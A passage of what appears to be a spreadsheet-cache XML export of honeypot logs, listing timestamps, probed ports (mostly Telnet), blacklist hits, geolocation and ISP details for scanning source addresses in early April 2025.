    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:badd"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2830"/>
    <x v="2830"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T22:01:02"/>
    <d v="2024-01-01T08:48:00"/>
    <d v="2025-04-06T22:01:02"/>
    <n v="951"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;20044&amp;&amp;NA&amp;&amp;41889"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="UA"/>
    <s v="Ukraine"/>
    <s v="07"/>
    <s v="Volyn"/>
    <s v="Kovel"/>
    <s v="Kovel"/>
    <s v="704617"/>
    <s v="NA"/>
    <s v="51.2153"/>
    <s v="24.7087"/>
    <s v="15895"/>
    <s v="Kyivstar PJSC"/>
    <s v="Kyivstar GSM"/>
    <s v="residential"/>
    <s v="Golden Telecom LLC"/>
    <s v="2010-05-17"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2e77:3d09"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2831"/>
    <x v="2831"/>
    <s v="host-80-117-69-168.retail.telecomitalia.it&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-06T22:00:53"/>
    <d v="2025-04-05T03:33:45"/>
    <d v="2025-04-06T22:00:53"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_TELNET_H2"/>
    <s v="9100&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="62"/>
    <s v="Lazio"/>
    <s v="Rome"/>
    <s v="Rome"/>
    <s v="3169070"/>
    <s v="00187"/>
    <s v="41.9618"/>
    <s v="12.4643"/>
    <s v="3269"/>
    <s v="Telecom Italia S.p.A."/>
    <s v="Telecom Italia S.p.A. TIN EASY LITE"/>
    <s v="residential"/>
    <s v="INTERBUSINESS"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_PJL:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5075:45a8"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2832"/>
    <x v="2832"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T21:59:34"/>
    <d v="2025-04-06T21:59:34"/>
    <d v="2025-04-06T21:59:34"/>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1:66a1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2833"/>
    <x v="2833"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T21:46:56"/>
    <d v="2025-04-06T21:46:56"/>
    <d v="2025-04-06T21:46:56"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SY"/>
    <s v="Syria"/>
    <s v="DI"/>
    <s v="Dimashq"/>
    <s v="NA"/>
    <s v="Damascus"/>
    <s v="170654"/>
    <s v="NA"/>
    <s v="33.5132"/>
    <s v="36.2768"/>
    <s v="29256"/>
    <s v="INT-PDN-STE-AS"/>
    <s v="Syrian Telecom"/>
    <s v="corporate"/>
    <s v="Mtn"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2530:baf8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2834"/>
    <x v="2834"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T21:41:52"/>
    <d v="2025-04-06T21:41:52"/>
    <d v="2025-04-06T21:41:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d2:b602"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2835"/>
    <x v="2835"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T21:35:23"/>
    <d v="2025-04-06T21:35:23"/>
    <d v="2025-04-06T21:35:23"/>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3b5c:a026"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2836"/>
    <x v="2836"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T21:18:58"/>
    <d v="2025-04-06T21:18:58"/>
    <d v="2025-04-06T21:18:58"/>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3:88db"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2837"/>
    <x v="2837"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T21:17:13"/>
    <d v="2025-04-06T21:17:13"/>
    <d v="2025-04-06T21:17:13"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Dakshin Kannad"/>
    <s v="Mangaluru"/>
    <s v="1263780"/>
    <s v="575001"/>
    <s v="12.9141"/>
    <s v="74.856"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e8:39fe"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2838"/>
    <x v="2838"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T21:06:58"/>
    <d v="2025-04-06T21:06:58"/>
    <d v="2025-04-06T21:06:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:f7a9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2839"/>
    <x v="2839"/>
    <s v="host-80-117-122-121.pool80117.interbusiness.it&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-06T21:00:58"/>
    <d v="2025-04-01T22:20:02"/>
    <d v="2025-04-06T21:00:58"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_PJL_H27&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="9100&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="IT"/>
    <s v="Italy"/>
    <s v="25"/>
    <s v="Lombardy"/>
    <s v="Milan"/>
    <s v="Milan"/>
    <s v="3173435"/>
    <s v="20121"/>
    <s v="45.4642"/>
    <s v="9.18998"/>
    <s v="3269"/>
    <s v="Telecom Italia S.p.A."/>
    <s v="Telecom Italia S.p.A. TIN EASY LITE"/>
    <s v="residential"/>
    <s v="INTERBUSINESS"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_PJL:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5075:7a79"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2840"/>
    <x v="2840"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T21:00:49"/>
    <d v="2024-07-10T11:38:00"/>
    <d v="2025-04-06T21:00:49"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f7:b442"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2841"/>
    <x v="2841"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T20:48:04"/>
    <d v="2025-01-12T01:18:14"/>
    <d v="2025-04-06T20:48:04"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2004-11-30"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb2:99c2"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2842"/>
    <x v="2842"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T20:38:59"/>
    <d v="2025-04-06T20:38:59"/>
    <d v="2025-04-06T20:38:59"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="RJ"/>
    <s v="Rajasthan"/>
    <s v="Ajmer"/>
    <s v="Ajmer"/>
    <s v="1279159"/>
    <s v="305001"/>
    <s v="26.4499"/>
    <s v="74.6399"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cf:2c57"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2843"/>
    <x v="2843"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T20:22:00"/>
    <d v="2025-04-06T20:22:00"/>
    <d v="2025-04-06T20:22:00"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>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d1:6fa8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2844"/>
    <x v="2844"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T20:20:48"/>
    <d v="2025-04-06T19:38:26"/>
    <d v="2025-04-06T20:20:48"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Connaught Lane)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6306"/>
    <s v="77.2239"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-SouthZone"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75eb:fc97"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2845"/>
    <x v="2845"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T19:49:34"/>
    <d v="2025-04-06T19:49:34"/>
    <d v="2025-04-06T19:49:34"/>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7:c4a5"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2846"/>
    <x v="2846"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T19:31:49"/>
    <d v="2025-03-17T09:13:09"/>
    <d v="2025-04-06T19:31:49"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_REDIS_HC1"/>
    <s v="9100&amp;&amp;6379&amp;&amp;5900&amp;&amp;3306&amp;&amp;389&amp;&amp;1521&amp;&amp;41148&amp;&amp;3389"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Chiyoda"/>
    <s v="Chiyoda"/>
    <s v="11749713"/>
    <s v="100-0001"/>
    <s v="35.694"/>
    <s v="139.754"/>
    <s v="7684"/>
    <s v="SAKURA Internet Inc."/>
    <s v="SAKURA Internet Inc."/>
    <s v="business"/>
    <s v="Architectural Systems Inc."/>
    <s v="1997-03-01"/>
    <s v="JPNIC-NET-JP-ERX"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_PJL:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;NA&amp;&amp;{Data_RDP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:85f2:dd13"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2847"/>
    <x v="2847"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T18:55:53"/>
    <d v="2025-04-06T18:55:53"/>
    <d v="2025-04-06T18:55:53"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f3:fc08"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2848"/>
    <x v="2848"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T18:35:26"/>
    <d v="2025-04-06T18:35:26"/>
    <d v="2025-04-06T18:35:26"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Pool Through BSNL"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:783d:5232"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2849"/>
    <x v="2849"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-06T18:15:59"/>
    <d v="2025-04-06T18:15:59"/>
    <d v="2025-04-06T18:15:59"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
